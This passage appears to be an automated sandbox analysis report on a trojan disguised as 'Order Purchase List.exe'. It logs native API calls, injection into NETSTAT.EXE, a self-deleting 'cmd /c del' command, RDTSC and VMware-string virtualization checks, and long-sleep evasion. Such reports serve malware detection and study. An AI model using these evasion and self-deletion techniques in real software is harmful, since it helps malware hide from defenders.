Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9610 NtEnumerateValueKey,	19_2_02EA9610
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA97A0 NtUnmapViewOfSection,	19_2_02EA97A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9760 NtOpenProcess,	19_2_02EA9760
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EAA770 NtOpenThread,	19_2_02EAA770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9770 NtSetInformationFile,	19_2_02EA9770
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9730 NtQueryVirtualMemory,	19_2_02EA9730
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EAA710 NtOpenProcessToken,	19_2_02EAA710
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA95F0 NtQueryInformationFile,	19_2_02EA95F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9560 NtWriteFile,	19_2_02EA9560
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA9520 NtWaitForSingleObject,	19_2_02EA9520
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EAAD30 NtSetContextThread,	19_2_02EAAD30
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B086A0 NtReadFile,	19_2_02B086A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B087D0 NtAllocateVirtualMemory,	19_2_02B087D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B08720 NtClose,	19_2_02B08720
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B085F0 NtCreateFile,	19_2_02B085F0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B087CA NtAllocateVirtualMemory,	19_2_02B087CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0871A NtClose,	19_2_02B0871A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B085EA NtCreateFile,	19_2_02B085EA

Source: Order Purchase List.exe, 00000000.00000000.270770185.00000000010C0000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe
Source: Order Purchase List.exe, 0000000A.00000000.315478812.0000000000B00000.00000002.00020000.sdmp	Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe
Source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Order Purchase List.exe
Source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs Order Purchase List.exe
Source: Order Purchase List.exe	Binary or memory string: OriginalFilename53z.exe4 vs Order Purchase List.exe

Source: Order Purchase List.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Source: Order Purchase List.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: Order Purchase List.exe	Virustotal: Detection: 34%
Source: Order Purchase List.exe	Metadefender: Detection: 40%
Source: Order Purchase List.exe	ReversingLabs: Detection: 67%

Source: Order Purchase List.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Order Purchase List.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Order Purchase List.exe 'C:\Users\user\Desktop\Order Purchase List.exe'
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process created: C:\Users\user\Desktop\Order Purchase List.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order Purchase List.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process created: C:\Users\user\Desktop\Order Purchase List.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order Purchase List.exe'	Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Order Purchase List.exe.log

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@7/1@6/4

Source: C:\Users\user\Desktop\Order Purchase List.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Order Purchase List.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Order Purchase List.exe

Static file information: File size 1104896 > 1048576

Source: Order Purchase List.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Order Purchase List.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x10d000

Source: Order Purchase List.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: netstat.pdbGCTL source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
Source:	Binary string: netstat.pdb source: Order Purchase List.exe, 0000000A.00000002.396574659.0000000001240000.00000040.00020000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE, 00000013.00000003.395986362.00000000004F0000.00000004.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Order Purchase List.exe, 0000000A.00000002.396916075.00000000017AF000.00000040.00000001.sdmp, NETSTAT.EXE

Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041B832 push eax; ret	10_2_0041B838
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041B83B push eax; ret	10_2_0041B8A2
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041B89C push eax; ret	10_2_0041B8A2
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0040AA98 pushfd ; retf	10_2_0040AA99
Source: C:\Users\user\Desktop\Order Purchase List.exe	Code function: 10_2_0041B7E5 push eax; ret	10_2_0041B838
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EBD0D1 push ecx; ret	19_2_02EBD0E4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02AFAA98 pushfd ; retf	19_2_02AFAA99
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0B89C push eax; ret	19_2_02B0B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0B832 push eax; ret	19_2_02B0B838
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0B83B push eax; ret	19_2_02B0B8A2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02B0B7E5 push eax; ret	19_2_02B0B838

Source: initial sample

Static PE information: section name: .text entropy: 7.614432754

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete

Show sources

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del 'C:\Users\user\Desktop\Order Purchase List.exe'
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: /c del 'C:\Users\user\Desktop\Order Purchase List.exe'			Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Order Purchase List.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Order Purchase List.exe	RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Order Purchase List.exe	RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002AF8614 second address: 0000000002AF861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\NETSTAT.EXE	RDTSC instruction interceptor: First address: 0000000002AF89AE second address: 0000000002AF89B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Order Purchase List.exe TID: 4536

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Last function: Thread delayed

Source: C:\Users\user\Desktop\Order Purchase List.exe

Code function: 10_2_004088E0 rdtsc

10_2_004088E0

Source: C:\Users\user\Desktop\Order Purchase List.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Order Purchase List.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.359000138.0000000008778000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
Source: explorer.exe, 0000000C.00000000.335317207.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
Source: explorer.exe, 0000000C.00000000.335317207.00000000067C2000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
Source: NETSTAT.EXE, 00000013.00000002.537333891.0000000000408000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlla
Source: explorer.exe, 0000000C.00000000.324091643.00000000086C9000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

Source: C:\Users\user\Desktop\Order Purchase List.exe

Code function: 10_2_004088E0 rdtsc

10_2_004088E0

Source: C:\Users\user\Desktop\Order Purchase List.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92AE4 mov eax, dword ptr fs:[00000030h]	19_2_02E92AE4
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92ACB mov eax, dword ptr fs:[00000030h]	19_2_02E92ACB
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E652A5 mov eax, dword ptr fs:[00000030h]	19_2_02E652A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E652A5 mov eax, dword ptr fs:[00000030h]	19_2_02E652A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E652A5 mov eax, dword ptr fs:[00000030h]	19_2_02E652A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E652A5 mov eax, dword ptr fs:[00000030h]	19_2_02E652A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E652A5 mov eax, dword ptr fs:[00000030h]	19_2_02E652A5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7AAB0 mov eax, dword ptr fs:[00000030h]	19_2_02E7AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7AAB0 mov eax, dword ptr fs:[00000030h]	19_2_02E7AAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9FAB0 mov eax, dword ptr fs:[00000030h]	19_2_02E9FAB0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9D294 mov eax, dword ptr fs:[00000030h]	19_2_02E9D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9D294 mov eax, dword ptr fs:[00000030h]	19_2_02E9D294
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA927A mov eax, dword ptr fs:[00000030h]	19_2_02EA927A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F1B260 mov eax, dword ptr fs:[00000030h]	19_2_02F1B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F1B260 mov eax, dword ptr fs:[00000030h]	19_2_02F1B260
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38A62 mov eax, dword ptr fs:[00000030h]	19_2_02F38A62
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69240 mov eax, dword ptr fs:[00000030h]	19_2_02E69240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69240 mov eax, dword ptr fs:[00000030h]	19_2_02E69240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69240 mov eax, dword ptr fs:[00000030h]	19_2_02E69240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69240 mov eax, dword ptr fs:[00000030h]	19_2_02E69240
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2EA55 mov eax, dword ptr fs:[00000030h]	19_2_02F2EA55
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EF4257 mov eax, dword ptr fs:[00000030h]	19_2_02EF4257
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA4A2C mov eax, dword ptr fs:[00000030h]	19_2_02EA4A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA4A2C mov eax, dword ptr fs:[00000030h]	19_2_02EA4A2C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2AA16 mov eax, dword ptr fs:[00000030h]	19_2_02F2AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2AA16 mov eax, dword ptr fs:[00000030h]	19_2_02F2AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E78A0A mov eax, dword ptr fs:[00000030h]	19_2_02E78A0A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6AA16 mov eax, dword ptr fs:[00000030h]	19_2_02E6AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6AA16 mov eax, dword ptr fs:[00000030h]	19_2_02E6AA16
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E83A1C mov eax, dword ptr fs:[00000030h]	19_2_02E83A1C
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E65210 mov eax, dword ptr fs:[00000030h]	19_2_02E65210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E65210 mov ecx, dword ptr fs:[00000030h]	19_2_02E65210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E65210 mov eax, dword ptr fs:[00000030h]	19_2_02E65210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E65210 mov eax, dword ptr fs:[00000030h]	19_2_02E65210
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E8DBE9 mov eax, dword ptr fs:[00000030h]	19_2_02E8DBE9
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E903E2 mov eax, dword ptr fs:[00000030h]	19_2_02E903E2
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE53CA mov eax, dword ptr fs:[00000030h]	19_2_02EE53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE53CA mov eax, dword ptr fs:[00000030h]	19_2_02EE53CA
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94BAD mov eax, dword ptr fs:[00000030h]	19_2_02E94BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94BAD mov eax, dword ptr fs:[00000030h]	19_2_02E94BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E94BAD mov eax, dword ptr fs:[00000030h]	19_2_02E94BAD
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F35BA5 mov eax, dword ptr fs:[00000030h]	19_2_02F35BA5
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E71B8F mov eax, dword ptr fs:[00000030h]	19_2_02E71B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E71B8F mov eax, dword ptr fs:[00000030h]	19_2_02E71B8F
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F1D380 mov ecx, dword ptr fs:[00000030h]	19_2_02F1D380
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2138A mov eax, dword ptr fs:[00000030h]	19_2_02F2138A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9B390 mov eax, dword ptr fs:[00000030h]	19_2_02E9B390
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E92397 mov eax, dword ptr fs:[00000030h]	19_2_02E92397
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6DB60 mov ecx, dword ptr fs:[00000030h]	19_2_02E6DB60
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E93B7A mov eax, dword ptr fs:[00000030h]	19_2_02E93B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E93B7A mov eax, dword ptr fs:[00000030h]	19_2_02E93B7A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6DB40 mov eax, dword ptr fs:[00000030h]	19_2_02E6DB40
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F38B58 mov eax, dword ptr fs:[00000030h]	19_2_02F38B58
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E6F358 mov eax, dword ptr fs:[00000030h]	19_2_02E6F358
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F2131B mov eax, dword ptr fs:[00000030h]	19_2_02F2131B
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E658EC mov eax, dword ptr fs:[00000030h]	19_2_02E658EC
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov eax, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov ecx, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov eax, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov eax, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov eax, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EFB8D0 mov eax, dword ptr fs:[00000030h]	19_2_02EFB8D0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EA90AF mov eax, dword ptr fs:[00000030h]	19_2_02EA90AF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E920A0 mov eax, dword ptr fs:[00000030h]	19_2_02E920A0
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9F0BF mov ecx, dword ptr fs:[00000030h]	19_2_02E9F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9F0BF mov eax, dword ptr fs:[00000030h]	19_2_02E9F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9F0BF mov eax, dword ptr fs:[00000030h]	19_2_02E9F0BF
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E69080 mov eax, dword ptr fs:[00000030h]	19_2_02E69080
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE3884 mov eax, dword ptr fs:[00000030h]	19_2_02EE3884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02EE3884 mov eax, dword ptr fs:[00000030h]	19_2_02EE3884
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F22073 mov eax, dword ptr fs:[00000030h]	19_2_02F22073
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F31074 mov eax, dword ptr fs:[00000030h]	19_2_02F31074
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E80050 mov eax, dword ptr fs:[00000030h]	19_2_02E80050
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E80050 mov eax, dword ptr fs:[00000030h]	19_2_02E80050
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9002D mov eax, dword ptr fs:[00000030h]	19_2_02E9002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9002D mov eax, dword ptr fs:[00000030h]	19_2_02E9002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9002D mov eax, dword ptr fs:[00000030h]	19_2_02E9002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9002D mov eax, dword ptr fs:[00000030h]	19_2_02E9002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E9002D mov eax, dword ptr fs:[00000030h]	19_2_02E9002D
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7B02A mov eax, dword ptr fs:[00000030h]	19_2_02E7B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7B02A mov eax, dword ptr fs:[00000030h]	19_2_02E7B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7B02A mov eax, dword ptr fs:[00000030h]	19_2_02E7B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02E7B02A mov eax, dword ptr fs:[00000030h]	19_2_02E7B02A
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F34015 mov eax, dword ptr fs:[00000030h]	19_2_02F34015
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Code function: 19_2_02F34015 mov eax, dword ptr fs:[00000030h]	19_2_02F34015
